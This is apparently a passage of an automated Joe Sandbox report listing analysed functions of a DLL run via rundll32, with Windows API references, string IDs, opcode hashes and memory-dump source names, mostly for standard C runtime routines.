                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                  • API String ID: 2559590344-537541572
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Thread$Current$Context
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1666949209-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID: {for
                                                                                                                                                                                                                                                  • API String ID: 2943138195-864106941
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: NameName::
                                                                                                                                                                                                                                                  • String ID: %lf
                                                                                                                                                                                                                                                  • API String ID: 1333004437-2891890143
                                                                                                                                                                                                                                                  • Opcode ID: 31f452ec5ec2fe0c56036b6d98129766a0febf28c96deb7dbc1a5cff6911fba6
                                                                                                                                                                                                                                                  • Instruction ID: 034e1c8f7962a666fb3fc1dfd84da393ef72e1dbc0cb733e50f71f00acf91dbc
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 31f452ec5ec2fe0c56036b6d98129766a0febf28c96deb7dbc1a5cff6911fba6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B331C372604F8C85EBA2DF25A8503EA6351B74EBC5F54C216FA9A4B791DF2CC3498340
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000F9F1
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000F9FF
                                                                                                                                                                                                                                                  • LoadLibraryExW.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FA29
                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FA97
                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(?,?,00000000,000000018000FDBF,?,?,?,000000018000BE8E,?,?,?,000000018000BE49), ref: 000000018000FAA3
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                  • Opcode ID: 08dec541e6110a4941d8e95383202020bda5a6dbff8e18ce6c91f5e870de479d
                                                                                                                                                                                                                                                  • Instruction ID: e8c6680ccd9c6dd87d65be781d57c711bd3b5d14812437631edbc0f748074d2d
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08dec541e6110a4941d8e95383202020bda5a6dbff8e18ce6c91f5e870de479d
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF318071312B4891EEA7DB12A8007E63394BB4DBE0F598635BD1D4BB95EF3CC6499301
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+Replicator::operator[]
                                                                                                                                                                                                                                                  • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                                                                                                                                                                                                                  • API String ID: 1405650943-2211150622
                                                                                                                                                                                                                                                  • Opcode ID: 11a5eadd5112610793a0c7985b347ede0ac6dc60e7be4f47023946e3fa5dab14
                                                                                                                                                                                                                                                  • Instruction ID: 1562cc7920372f8d96896f4d2247b54c2eb0bb003fb5d717fc29c8b40e6cc5f0
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 11a5eadd5112610793a0c7985b347ede0ac6dc60e7be4f47023946e3fa5dab14
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA415FB6605F8898FBA28B68D8413EC77A0B30D788F54C415EA4817794DF79C749C711
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID: char $int $long $short $unsigned
                                                                                                                                                                                                                                                  • API String ID: 2943138195-3894466517
                                                                                                                                                                                                                                                  • Opcode ID: 22589a7dd1b7f51ecc45e5e498e836ee65e773c3e0422199170bc379ef7ced78
                                                                                                                                                                                                                                                  • Instruction ID: 33d68ee0dd99e5be83c02a107bf8deb86d92894b08a7c1c4eda6edb91acda212
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 22589a7dd1b7f51ecc45e5e498e836ee65e773c3e0422199170bc379ef7ced78
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 71316876614B58C8FB968F68E8513EC37B1B34D789F54C115EA885BBA8DF38C648C740
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$AddressErrorFreeLastProc
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 2559590344-2084034818
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                  • API String ID: 3813093105-537541572
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                  • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                  • API String ID: 3813093105-537541572
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                                                                                                                  • String ID: CONOUT$
                                                                                                                                                                                                                                                  • API String ID: 3230265001-3130406586
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+$NameName::
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 168861036-0
                                                                                                                                                                                                                                                  • Opcode ID: 806119ddee8275eca90a34da7f6d98c465c2b67501ebe87a489ba9b8b95362ce
                                                                                                                                                                                                                                                  • Instruction ID: 09ad68218d141e964a4945e14ce8a54b78ee7b9198dbdf3b1dfc829bb6e04cef
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 806119ddee8275eca90a34da7f6d98c465c2b67501ebe87a489ba9b8b95362ce
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7719D72610B98C9FB92CFA4E8803EC37A1F349795F61C016EA891B795DF79C659C301
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                  • String ID: csm$csm$csm
                                                                                                                                                                                                                                                  • API String ID: 3523768491-393685449
                                                                                                                                                                                                                                                  • Opcode ID: bda6544fe4ae76e9c966046574d2ab8aba2e0a6057aceda30bee322fd5c5b1c4
                                                                                                                                                                                                                                                  • Instruction ID: f316bf09ab0905bbfcd6d3bf85c0ee5a6f9e6efb4081dae354aa448471526a42
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bda6544fe4ae76e9c966046574d2ab8aba2e0a6057aceda30bee322fd5c5b1c4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E8E1AE725047888AE7A2DF78D4803ED7BA1F759788F148226FF8957696CF34C689CB01
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 0000000180041917
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004194D
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004197A
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004198B
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 000000018004199C
                                                                                                                                                                                                                                                  • SetLastError.KERNEL32(?,?,00000000,0000000180041D0D,?,?,?,?,0000000180041BB4), ref: 00000001800419B7
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value$ErrorLast
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2506987500-0
                                                                                                                                                                                                                                                  • Opcode ID: 06c95a4aa1771613fd3935f9b6fa3d2226365f91a529870d9feca7c030eab943
                                                                                                                                                                                                                                                  • Instruction ID: a236a635390231764599b441ca33359ecfb18b4257108ec610f8a3aa5a970b1f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 06c95a4aa1771613fd3935f9b6fa3d2226365f91a529870d9feca7c030eab943
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01118E30204E4846F6D6632155A53FD5242BB4C7F9F15C724F876177C6EE288B095749
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Name::operator+
                                                                                                                                                                                                                                                  • String ID: std::nullptr_t$std::nullptr_t $volatile$volatile
                                                                                                                                                                                                                                                  • API String ID: 2943138195-757766384
                                                                                                                                                                                                                                                  • Opcode ID: 037b52de5d520ae03becac24376554bd3a1233cb3c82c6952893d7c61cf1fdce
                                                                                                                                                                                                                                                  • Instruction ID: 4038f050409aa154ac6b01109c2d1ae91dabd18faee6e66f8a741a0bb842cd02
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 037b52de5d520ae03becac24376554bd3a1233cb3c82c6952893d7c61cf1fdce
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C2716A76701B4898EB968F68D8503EC66B5B30D7C4F94C529FA5907BA6DF39C3A8C340
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  • Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: NameName::
                                                                                                                                                                                                                                                  • String ID: `template-parameter$void
                                                                                                                                                                                                                                                  • API String ID: 1333004437-4057429177
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 3813093105-2084034818
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Library$Load$ErrorFreeLast
                                                                                                                                                                                                                                                  • String ID: api-ms-
                                                                                                                                                                                                                                                  • API String ID: 3813093105-2084034818
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CurrentThread
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2882836952-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AdjustPointer
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1740715915-0
                                                                                                                                                                                                                                                  • Opcode ID: b7f25e227ec73591775f402b439beda8c2004b6fb1d37a0a7765b10afffff269
                                                                                                                                                                                                                                                  • Instruction ID: 135fc376b1a8cfedf6fd7dae04e6b903f416e55d44e7b02af783c7e71b4be7be
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b7f25e227ec73591775f402b439beda8c2004b6fb1d37a0a7765b10afffff269
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 26B19332216A4881EAE7DB559480BFD77A0EB5CBC4F09C426BE4A47785DF38C74AC742
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000006.00000002.3791752519.0000000180001000.00000020.00000001.01000000.00000005.sdmp, Offset: 0000000180000000, based on PE: true
• Associated: 00000006.00000002.3791648369.0000000180000000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792001676.000000018005F000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792108362.0000000180073000.00000004.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3792216235.0000000180074000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794049644.0000000180077000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794230283.000000018007C000.00000008.00000001.01000000.00000005.sdmp
• Associated: 00000006.00000002.3794279409.000000018007D000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: NameName::$Name::operator+
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 826178784-0
                                                                                                                                                                                                                                                  • Opcode ID: 157e1aa60b488d9254f56a5c3751a730c19624724a7ec1fbf038d5f98596ec9c
                                                                                                                                                                                                                                                  • Instruction ID: dc3e5c478041bf289d860fee317c83415d36c744b4e48cd64d64fa13d1e4a70b
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 157e1aa60b488d9254f56a5c3751a730c19624724a7ec1fbf038d5f98596ec9c
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 77416B36201E58D8EB92CB61E8903EC37B4B719BC5FA48016EAA95B395DF75C759C300
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • FlsGetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 00000001800419EF
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A0E
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A36
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A47
                                                                                                                                                                                                                                                  • FlsSetValue.KERNEL32(?,?,?,00000001800401C7,?,?,00000000,00000001800404FE,?,?,?,?,?,000000018004048A), ref: 0000000180041A58
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                                  • Opcode ID: 157056b5f07e6d5b21f7a52ee4ede94ab6a34c5cf7ed9480ed3c8b7af57ff7d6
                                                                                                                                                                                                                                                  • Instruction ID: e93ad22c6cc443ae94773b33ba4779df2cc7973ffbf2f88c150105d93498b686
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 157056b5f07e6d5b21f7a52ee4ede94ab6a34c5cf7ed9480ed3c8b7af57ff7d6
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 00118E30205E4845FADA672195D63FD22417B4C7F9F0AC724B83A066D6EE28CB29574A
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Value
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3702945584-0
                                                                                                                                                                                                                                                  • Opcode ID: 9832f5b7719f7b86fd8c38624eed4aee1a7210bb3eeaaf95e05a674a0a924b3e
